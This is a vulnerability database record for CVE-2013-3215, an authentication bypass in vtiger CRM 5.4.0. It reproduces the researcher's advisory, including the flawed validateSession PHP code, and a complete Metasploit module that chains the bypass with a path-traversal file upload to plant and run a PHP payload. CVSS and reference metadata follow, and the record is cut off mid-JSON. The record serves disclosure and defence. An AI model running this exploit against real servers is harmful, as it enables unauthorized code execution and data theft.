var-202001-0887
Vulnerability from variot
vtiger CRM 5.4.0 and earlier contain an Authentication Bypass Vulnerability due to improper authentication validation in the validateSession function. vtiger CRM Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. vtiger CRM is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information.
[-] Vulnerability Description:
The vulnerable code is located in the validateSession() function, which is defined in multiple SOAP services:
function validateSession($username, $sessionid) { global $adb,$current_user; $adb->println("Inside function validateSession($username, $sessionid)"); require_once("modules/Users/Users.php"); $seed_user = new Users(); $id = $seed_user->retrieve_user_id($username);
$server_sessionid = getServerSessionId($id);
$adb->println("Checking Server session id and customer input session id ==> $server_sessionid == $sessionid");
if($server_sessionid == $sessionid)
{
$adb->println("Session id match. Authenticated to do the current operation.");
return true;
}
else
{
$adb->println("Session id does not match. Not authenticated to do the current operation.");
return false;
}
}
The vulnerability exists because the "sessionid" parameter isn't properly validated before being compared with the $server_sessionid variable, which is the value returned by the getServerSessionId() function. If called with an invalid session ID, then this function will return "null", in this case the validateSession() will return "true" if the "sessionid" parameter is set to 0, "false", or "null". by calling a SOAP method without providing the "username" and "sessionid" parameters.
[-] Solution:
Apply the vendor patch:http://www.vtiger.com/blogs/?p=1467
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3215 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-08
. ##
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core' require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper
def initialize(info = {}) super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2. }, 'Author' => [ 'Egidio Romano', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3214' ], [ 'CVE', '2013-3215' ], [ 'OSVDB', '95902' ], [ 'OSVDB', '95903' ], [ 'BID', '61558' ], [ 'BID', '61559' ], [ 'EDB', '27279' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { # Arbitrary big number. The payload is sent base64 encoded # into a POST SOAP request 'Space' => 262144, # 256k 'DisableNops' => true }, 'Targets' => [ [ 'vTigerCRM v5.4.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2013'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
], self.class)
end
def check test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4))) res = send_soap_request(test_one)
unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
return Exploit::CheckCode::Unknown
end
test_two = check_email_soap("admin")
res = send_soap_request(test_two)
if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit file_name = rand_text_alpha(rand(10)+6) + '.php' php = %Q||
soap = add_attachment_soap(file_name, php)
res = send_soap_request(soap)
print_status("#{peer} - Uploading payload...")
if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
print_good("#{peer} - Upload successfully uploaded")
register_files_for_cleanup(file_name)
else
fail_with(Failure::Unknown, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
end
def add_attachment_soap(file_name, file_data) xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:AddEmailAttachment", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("emailid", {'xsi:type' => 'xsd:string'}) crm.add_element("filedata", {'xsi:type' => 'xsd:string'}) crm.add_element("filename", {'xsi:type' => 'xsd:string'}) crm.add_element("filesize", {'xsi:type' => 'xsd:string'}) crm.add_element("filetype", {'xsi:type' => 'xsd:string'}) crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['emailid'].text = rand_text_alpha(4+rand(4)) crm.elements['filedata'].text = "MSF_PAYLOAD" crm.elements['filename'].text = "MSF_FILENAME" crm.elements['filesize'].text = file_data.length.to_s crm.elements['filetype'].text = "php" crm.elements['username'].text = rand_text_alpha(4+rand(4))
xml_string = xml.to_s
xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
return xml_string
end
def check_email_soap(user_name = "", session = "") xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:CheckEmailPermission", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['username'].text = user_name crm.elements['session'].text = session
xml.to_s
end
def send_soap_request(soap_data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_data })
return res
end
end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0887",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "crm",
"scope": "lte",
"trust": 1.8,
"vendor": "vtiger",
"version": "5.4.0"
},
{
"model": "crm",
"scope": "gte",
"trust": 1.0,
"vendor": "vtiger",
"version": "5.1.0"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.8,
"vendor": "vtiger",
"version": null
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.3"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.2.1"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.2"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.1"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.0.4"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.0.3"
},
{
"model": "crm rc",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.0.4"
}
],
"sources": [
{
"db": "BID",
"id": "61559"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Egidio Romano",
"sources": [
{
"db": "BID",
"id": "61559"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-010"
}
],
"trust": 0.9
},
"cve": "CVE-2013-3215",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2013-3215",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-63217",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-3215",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-3215",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-3215",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2013-3215",
"trust": 0.8,
"value": "Critical"
},
{
"author": "VULHUB",
"id": "VHN-63217",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63217"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "vtiger CRM 5.4.0 and earlier contain an Authentication Bypass Vulnerability due to improper authentication validation in the validateSession function. vtiger CRM Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. vtiger CRM is prone to an authentication-bypass vulnerability. \nAn attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. \nvtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. \n\n\n[-] Vulnerability Description:\n\nThe vulnerable code is located in the validateSession() function, which is defined in multiple SOAP services:\n\nfunction validateSession($username, $sessionid)\n{\n global $adb,$current_user;\n $adb-\u003eprintln(\"Inside function validateSession($username, $sessionid)\");\n require_once(\"modules/Users/Users.php\");\n $seed_user = new Users();\n $id = $seed_user-\u003eretrieve_user_id($username);\n \n $server_sessionid = getServerSessionId($id);\n \n $adb-\u003eprintln(\"Checking Server session id and customer input session id ==\u003e $server_sessionid == $sessionid\");\n \n if($server_sessionid == $sessionid)\n {\n $adb-\u003eprintln(\"Session id match. Authenticated to do the current operation.\");\n return true;\n }\n else\n {\n $adb-\u003eprintln(\"Session id does not match. Not authenticated to do the current operation.\");\n return false;\n }\n}\n\nThe vulnerability exists because the \"sessionid\" parameter isn\u0027t properly validated before being\ncompared with the $server_sessionid variable, which is the value returned by the getServerSessionId()\nfunction. If called with an invalid session ID, then this function will return \"null\", in this case the\nvalidateSession() will return \"true\" if the \"sessionid\" parameter is set to 0, \"false\", or \"null\". by calling a SOAP method\nwithout providing the \"username\" and \"sessionid\" parameters. \n\n\n[-] Solution:\n\nApply the vendor patch:http://www.vtiger.com/blogs/?p=1467\n\n\n[-] Disclosure Timeline:\n\n[13/01/2013] - Vendor notified\n[06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848\n[05/03/2013] - Feedback provided to the vendor\n[26/03/2013] - Vendor patch released\n[18/04/2013] - CVE number requested\n[20/04/2013] - CVE number assigned\n[01/08/2013] - Public disclosure\n\n\n[-] CVE Reference:\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\nhas assigned the name CVE-2013-3215 to this vulnerability. \n\n\n[-] Credits:\n\nVulnerability discovered by Egidio Romano. \n\n\n[-] Original Advisory:\n\nhttp://karmainsecurity.com/KIS-2013-08\n\n. ##\n# This module requires Metasploit: http//metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027msf/core\u0027\nrequire \u0027rexml/document\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include REXML\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n \u0027Name\u0027 =\u003e \u0027vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload\u0027,\n \u0027Description\u0027 =\u003e %q{\n vTiger CRM allows an user to bypass authentication when requesting SOAP services. \n In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP\n service. By combining both vulnerabilities an attacker can upload and execute PHP\n code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu\n 10.04 and Windows 2003 SP2. \n },\n \u0027Author\u0027 =\u003e\n [\n \u0027Egidio Romano\u0027, # Vulnerability discovery\n \u0027juan vazquez\u0027 # msf module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e\n [\n [ \u0027CVE\u0027, \u00272013-3214\u0027 ],\n [ \u0027CVE\u0027, \u00272013-3215\u0027 ],\n [ \u0027OSVDB\u0027, \u002795902\u0027 ],\n [ \u0027OSVDB\u0027, \u002795903\u0027 ],\n [ \u0027BID\u0027, \u002761558\u0027 ],\n [ \u0027BID\u0027, \u002761559\u0027 ],\n [ \u0027EDB\u0027, \u002727279\u0027 ],\n [ \u0027URL\u0027, \u0027http://karmainsecurity.com/KIS-2013-07\u0027 ],\n [ \u0027URL\u0027, \u0027http://karmainsecurity.com/KIS-2013-08\u0027 ]\n ],\n \u0027Privileged\u0027 =\u003e false,\n \u0027Platform\u0027 =\u003e [\u0027php\u0027],\n \u0027Arch\u0027 =\u003e ARCH_PHP,\n \u0027Payload\u0027 =\u003e\n {\n # Arbitrary big number. The payload is sent base64 encoded\n # into a POST SOAP request\n \u0027Space\u0027 =\u003e 262144, # 256k\n \u0027DisableNops\u0027 =\u003e true\n },\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027vTigerCRM v5.4.0\u0027, { } ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DisclosureDate\u0027 =\u003e \u0027Mar 26 2013\u0027))\n\n register_options(\n [\n OptString.new(\u0027TARGETURI\u0027, [ true, \"Base vTiger CRM directory path\", \u0027/vtigercrm/\u0027])\n ], self.class)\n end\n\n def check\n test_one = check_email_soap(\"admin\", rand_text_alpha(4 + rand(4)))\n res = send_soap_request(test_one)\n\n unless res and res.code == 200 and res.body.to_s =~ /\u003creturn xsi:nil=\"true\" xsi:type=\"xsd:string\"\\/\u003e/\n return Exploit::CheckCode::Unknown\n end\n\n test_two = check_email_soap(\"admin\")\n res = send_soap_request(test_two)\n\n if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /\u003creturn xsi:type=\"xsd:string\"\u003e.*\u003c\\/return\u003e/)\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n file_name = rand_text_alpha(rand(10)+6) + \u0027.php\u0027\n php = %Q|\u003c?php #{payload.encoded} ?\u003e|\n\n soap = add_attachment_soap(file_name, php)\n res = send_soap_request(soap)\n\n print_status(\"#{peer} - Uploading payload...\")\n if res and res.code == 200 and res.body.to_s =~ /\u003creturn xsi:type=\"xsd:string\"\u003e.*\u003c\\/return\u003e/\n print_good(\"#{peer} - Upload successfully uploaded\")\n register_files_for_cleanup(file_name)\n else\n fail_with(Failure::Unknown, \"#{peer} - Upload failed\")\n end\n\n print_status(\"#{peer} - Executing payload...\")\n send_request_cgi({\u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027soap\u0027, file_name)}, 0)\n end\n\n def add_attachment_soap(file_name, file_data)\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n \u0027xmlns:xsi\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema-instance\",\n \u0027xmlns:xsd\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema\",\n \u0027xmlns:soapenv\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/envelope/\",\n \u0027xmlns:crm\u0027 =\u003e \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = xml.root.elements[2]\n body.add_element(\n \"crm:AddEmailAttachment\",\n {\n \u0027soapenv:encodingStyle\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"emailid\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filedata\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filename\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filesize\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filetype\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"username\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"session\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.elements[\u0027emailid\u0027].text = rand_text_alpha(4+rand(4))\n crm.elements[\u0027filedata\u0027].text = \"MSF_PAYLOAD\"\n crm.elements[\u0027filename\u0027].text = \"MSF_FILENAME\"\n crm.elements[\u0027filesize\u0027].text = file_data.length.to_s\n crm.elements[\u0027filetype\u0027].text = \"php\"\n crm.elements[\u0027username\u0027].text = rand_text_alpha(4+rand(4))\n\n xml_string = xml.to_s\n xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))\n xml_string.gsub!(/MSF_FILENAME/, \"../../../../../../#{file_name}\")\n\n return xml_string\n end\n\n def check_email_soap(user_name = \"\", session = \"\")\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n \u0027xmlns:xsi\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema-instance\",\n \u0027xmlns:xsd\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema\",\n \u0027xmlns:soapenv\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/envelope/\",\n \u0027xmlns:crm\u0027 =\u003e \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = xml.root.elements[2]\n body.add_element(\n \"crm:CheckEmailPermission\",\n {\n \u0027soapenv:encodingStyle\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"username\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"session\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.elements[\u0027username\u0027].text = user_name\n crm.elements[\u0027session\u0027].text = session\n\n xml.to_s\n end\n\n def send_soap_request(soap_data)\n res = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027soap\u0027, \u0027vtigerolservice.php\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027ctype\u0027 =\u003e \u0027text/xml; charset=UTF-8\u0027,\n \u0027data\u0027 =\u003e soap_data\n })\n\n return res\n end\n\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3215"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "BID",
"id": "61559"
},
{
"db": "VULHUB",
"id": "VHN-63217"
},
{
"db": "PACKETSTORM",
"id": "122648"
},
{
"db": "PACKETSTORM",
"id": "124698"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-63217",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63217"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-3215",
"trust": 3.0
},
{
"db": "BID",
"id": "61559",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201308-010",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "122648",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "27279",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-63217",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "124698",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63217"
},
{
"db": "BID",
"id": "61559"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "PACKETSTORM",
"id": "122648"
},
{
"db": "PACKETSTORM",
"id": "124698"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-010"
},
{
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"id": "VAR-202001-0887",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-63217"
}
],
"trust": 0.62916664
},
"last_update_date": "2024-08-14T13:25:07.543000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "http://vtiger-crm.2324883.n4.nabble.com/"
},
{
"title": "Vtiger CRM validateSession() Fixes for authentication bypass vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=109037"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-010"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.1
},
{
"problemtype": "Incorrect authentication (CWE-287) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63217"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/86163"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/61559"
},
{
"trust": 1.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3215"
},
{
"trust": 0.4,
"url": "http://www.vtiger.com/"
},
{
"trust": 0.1,
"url": "http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848"
},
{
"trust": 0.1,
"url": "http://karmainsecurity.com/kis-2013-08"
},
{
"trust": 0.1,
"url": "http://www.vtiger.com/blogs/?p=1467"
},
{
"trust": 0.1,
"url": "http://karmainsecurity.com/kis-2013-08\u0027"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema\","
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\""
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\","
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\","
},
{
"trust": 0.1,
"url": "http://karmainsecurity.com/kis-2013-07\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3214"
},
{
"trust": 0.1,
"url": "http://www.vtiger.com/products/crm\""
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63217"
},
{
"db": "BID",
"id": "61559"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "PACKETSTORM",
"id": "122648"
},
{
"db": "PACKETSTORM",
"id": "124698"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-010"
},
{
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-63217"
},
{
"db": "BID",
"id": "61559"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"db": "PACKETSTORM",
"id": "122648"
},
{
"db": "PACKETSTORM",
"id": "124698"
},
{
"db": "CNNVD",
